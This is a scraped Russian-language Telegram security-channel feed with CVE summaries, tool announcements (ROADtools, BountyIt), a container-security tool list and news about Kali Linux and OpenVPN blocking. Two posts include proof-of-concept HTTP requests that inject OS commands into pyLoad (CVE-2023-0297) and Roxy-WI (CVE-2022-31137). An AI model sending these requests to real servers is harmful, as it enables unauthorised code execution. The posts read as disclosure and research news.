Forwarded from Monkey Hacker
Pre-auth RCE in pyLoad (CVE-2023-0297)
😁
В функции
Ну и получилось так
pyLoad - это менеджер загрузки OSS, написанный на Python и управляемый через веб-интерфейс. В нем недавно нашли вулну и зарепортили на бб, связанную с js2py. Кратко это интеграция JS в Python В функции
eval_js(), заметили момент, что параметр jk выполняет JS код. Люди поковырялись и поняли, что туда спокойно можно положить любую команду.Ну и получилось так
POST /amogus/test HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
jk=pyimport%20os;os.system("touch%20/tmp/pwnd");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaPlease open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad: CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad
CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad - bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
Проверил, интересный материал. Хоть и написан специфично, зато прямолинейно и понятно)
🔴KeePass 2.X Master Password Dumper
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
🔥5❤1🐳1
🟣Тестируем заявленные супервозможности нового защищённого мессенджера
Как я случайно взломал «несуществующую» базу данных и нашёл все приватные ключи в мессенджере с «эталонным» уровнем шифрования. Рассказ о подробном анализе Converso и развенчивании смелых заявлений разработчиков о том, что их продукт не собирает пользовательские данные, не отслеживает метаданные, не использует серверы и вообще является передовым решением в области конфиденциального обмена сообщениями, превосходящим всем известные WhatsApp, Telegram и Signal.
#appsec
Как я случайно взломал «несуществующую» базу данных и нашёл все приватные ключи в мессенджере с «эталонным» уровнем шифрования. Рассказ о подробном анализе Converso и развенчивании смелых заявлений разработчиков о том, что их продукт не собирает пользовательские данные, не отслеживает метаданные, не использует серверы и вообще является передовым решением в области конфиденциального обмена сообщениями, превосходящим всем известные WhatsApp, Telegram и Signal.
#appsec
👏3🆒1
🔴ROADtools
(Rogue Office 365 and Azure (active) Directory tools)
ROADtools - это фреймворк для взаимодействия с Azure AD. Он состоит из библиотеки (roadlib) со следующими компонентами:
1. Инструмент ROADrecon для изучения Azure AD. ROADrecon - это инструмент для исследования Azure AD. Чтобы обеспечить полную гибкость, инструмент использует для этого 3 простых шага:
1.1. Аутентификация
1.2. Сбор данных
1.3. Исследование или преобразование данных
2. Инструмент ROADtools Token eXchange (roadtx). ROADtools Token eXchange, или сокращенно roadtx, - это инструмент для автоматизации и реализации процессов аутентификации и регистрации в Azure AD. Он ориентирован на токены, такие как (первичные) токены обновления и токены доступа.
Установка:
(Rogue Office 365 and Azure (active) Directory tools)
ROADtools - это фреймворк для взаимодействия с Azure AD. Он состоит из библиотеки (roadlib) со следующими компонентами:
1. Инструмент ROADrecon для изучения Azure AD. ROADrecon - это инструмент для исследования Azure AD. Чтобы обеспечить полную гибкость, инструмент использует для этого 3 простых шага:
1.1. Аутентификация
1.2. Сбор данных
1.3. Исследование или преобразование данных
2. Инструмент ROADtools Token eXchange (roadtx). ROADtools Token eXchange, или сокращенно roadtx, - это инструмент для автоматизации и реализации процессов аутентификации и регистрации в Azure AD. Он ориентирован на токены, такие как (первичные) токены обновления и токены доступа.
Установка:
pip install roadrecon
pip install roadtx#tools #recon
Microsoft: Windows Privilege Escalation
CVE-2020-0787
CVE-2020-0787 - это уязвимость повышения привилегий Windows, которая влияет на службу Background Intelligent Transfer Service (BITS). BITS - это служба, которая позволяет приложениям передавать файлы по сети в фоновом режиме. Уязвимость существует в том, как BITS обрабатывает символические ссылки. Символическая ссылка - это файл, который указывает на другой файл. Злоумышленник может использовать эту уязвимость, создав специально подготовленную символическую ссылку, которая при открытии пользователем с ограниченными правами позволит злоумышленнику выполнить произвольный код с повышенными привилегиями.
Уязвимость была обнаружена Jonas Lykkegaard. Microsoft выпустила обновление безопасности для устранения уязвимости 10 марта 2020 года. Чтобы использовать эту уязвимость, злоумышленник должен сначала войти в систему с ограниченными правами. Затем злоумышленник может запустить специально подготовленное приложение, которое может использовать уязвимость и получить контроль над затронутой системой.
#CVE #PrivEsc
CVE-2020-0787
CVE-2020-0787 - это уязвимость повышения привилегий Windows, которая влияет на службу Background Intelligent Transfer Service (BITS). BITS - это служба, которая позволяет приложениям передавать файлы по сети в фоновом режиме. Уязвимость существует в том, как BITS обрабатывает символические ссылки. Символическая ссылка - это файл, который указывает на другой файл. Злоумышленник может использовать эту уязвимость, создав специально подготовленную символическую ссылку, которая при открытии пользователем с ограниченными правами позволит злоумышленнику выполнить произвольный код с повышенными привилегиями.
Уязвимость была обнаружена Jonas Lykkegaard. Microsoft выпустила обновление безопасности для устранения уязвимости 10 марта 2020 года. Чтобы использовать эту уязвимость, злоумышленник должен сначала войти в систему с ограниченными правами. Затем злоумышленник может запустить специально подготовленное приложение, которое может использовать уязвимость и получить контроль над затронутой системой.
#CVE #PrivEsc
🆒4🔥3
🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
PoC:
#CVE #POC
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
/app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.PoC:
POST /app/options.py HTTP/1.1";id+##&backend_server=127.0.0.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
#CVE #POC
Forwarded from Hacker News
Российские провайдеры начали блокировать подключения OpenVPN
https://xakep.ru/2023/05/31/openvpn-block/
https://xakep.ru/2023/05/31/openvpn-block/
XAKEP
Российские провайдеры начали блокировать подключения OpenVPN
Пользователи и эксперты заметили, что 30-31 мая 2023 года российские интернет-провайдеры по всей стране начали блокировать подключения по протоколу OpenVPN.
🤣3🌚2🗿1
Hacker News
Российские провайдеры начали блокировать подключения OpenVPN https://xakep.ru/2023/05/31/openvpn-block/
Wireguard пока работает стабильно. Но возможно он на очереди на расстрел 🔫
Please open Telegram to view this post
VIEW IN TELEGRAM
Предлагайте свои идеи/технологии на замену заблокированных. Если соберём список, то сделаю ресерч на что и как лучше переходить.
🤣7❤1
Forwarded from Just Security
Туллинг для специалистов по безопасности контейнеров
В современной разработке контейнеризация радикально изменила способ, которым мы создаем, развертываем и управляем приложениями. Но с этой новой парадигмой приходит и критическая необходимость в безопасности контейнеров.
Вашему вниманию предлагается несколько категорий и инструментов, которые помогут поддержать уровень защищенности на приемлемом уровне (только free / opensource):
Container image scanning:
- Clair
- Trivy
- Anchore Engine
- Grype
Container orchestration:
- Kubernetes
- Apache Mesos
- Nomad
Runtime protection:
- Tracee
- Sysdig
- Falco
- KuberArmor
Configuration management:
- Ansible
- Chef
- Puppet
Vulnerability management:
- Greenbone
- DefectDojo
Container firewall:
- Calico
- Cilium
- Weave Net
Security information and event management (SIEM):
- ELK
- Wazuh
Identity and access management (IAM):
- Keycloak
- OpenIAM
Continuous integration and deployment (CI/CD):
- Jenkins
- GitLab CI/CD
- Travis CI
- GitHub Actions
- Bamboo
Incident response:
- TheHive
Kubernetes Security:
- Aqua Security
- Sysdig Secure
- Twistlock
В современной разработке контейнеризация радикально изменила способ, которым мы создаем, развертываем и управляем приложениями. Но с этой новой парадигмой приходит и критическая необходимость в безопасности контейнеров.
Вашему вниманию предлагается несколько категорий и инструментов, которые помогут поддержать уровень защищенности на приемлемом уровне (только free / opensource):
Container image scanning:
- Clair
- Trivy
- Anchore Engine
- Grype
Container orchestration:
- Kubernetes
- Apache Mesos
- Nomad
Runtime protection:
- Tracee
- Sysdig
- Falco
- KuberArmor
Configuration management:
- Ansible
- Chef
- Puppet
Vulnerability management:
- Greenbone
- DefectDojo
Container firewall:
- Calico
- Cilium
- Weave Net
Security information and event management (SIEM):
- ELK
- Wazuh
Identity and access management (IAM):
- Keycloak
- OpenIAM
Continuous integration and deployment (CI/CD):
- Jenkins
- GitLab CI/CD
- Travis CI
- GitHub Actions
- Bamboo
Incident response:
- TheHive
Kubernetes Security:
- Aqua Security
- Sysdig Secure
- Twistlock
🔴BountyIt
Fuzzer на golang для поиска уязвимостей типа xss, lfi, rce, ssti и т.д., который обнаруживает уязвимость по изменению длины содержимого и проверяет ее с помощью сигнатур.
Установка:
Fuzzer на golang для поиска уязвимостей типа xss, lfi, rce, ssti и т.д., который обнаруживает уязвимость по изменению длины содержимого и проверяет ее с помощью сигнатур.
Установка:
go install github.com/shivangx01b/BountyIt@latest
Синтаксис фаззинга:https://example.com/FUZZ
https://example.com/?query=FUZZ
Использование:echo "https://example.com/FUZZ" | BountyIt
cat http_https.txt | BountyIt -t 70 -p payloads.txt -verify
cat http_https.txt | BountyIt -t 70 -header "Cookie: session=311x1211sx4..." -p payloads.txt -grep signatures.txt
#tools #bugbounty❤4❤🔥2🆒1
Вышла Kali Linux 2023.2 с 13 новыми инструментами и образом HyperV
Компания Offensive Security представила Kali Linux 2023.2, вторую версию дистрибутива в 2023 году. Теперь Kali содержит готовый образ Hyper-V и тринадцать новых инструментов, включая фреймворк Evilginx для кражи учетных данных и cookie сеансов.
Одним из наиболее заметных обновлений в этом выпуске стал pre-built образ Hyper-V, настроенный для Enhanced Session Mode, что позволяет подключаться к виртуальной машине с помощью RDP. Новый образ Hyper-V уже можно загрузить с kali.org, после чего останется распаковать и запустить извлеченный скрипт install-vm.bat.
#kali_update
Компания Offensive Security представила Kali Linux 2023.2, вторую версию дистрибутива в 2023 году. Теперь Kali содержит готовый образ Hyper-V и тринадцать новых инструментов, включая фреймворк Evilginx для кражи учетных данных и cookie сеансов.
Одним из наиболее заметных обновлений в этом выпуске стал pre-built образ Hyper-V, настроенный для Enhanced Session Mode, что позволяет подключаться к виртуальной машине с помощью RDP. Новый образ Hyper-V уже можно загрузить с kali.org, после чего останется распаковать и запустить извлеченный скрипт install-vm.bat.
#kali_update
👍1
❤8🔥5👍2🐳1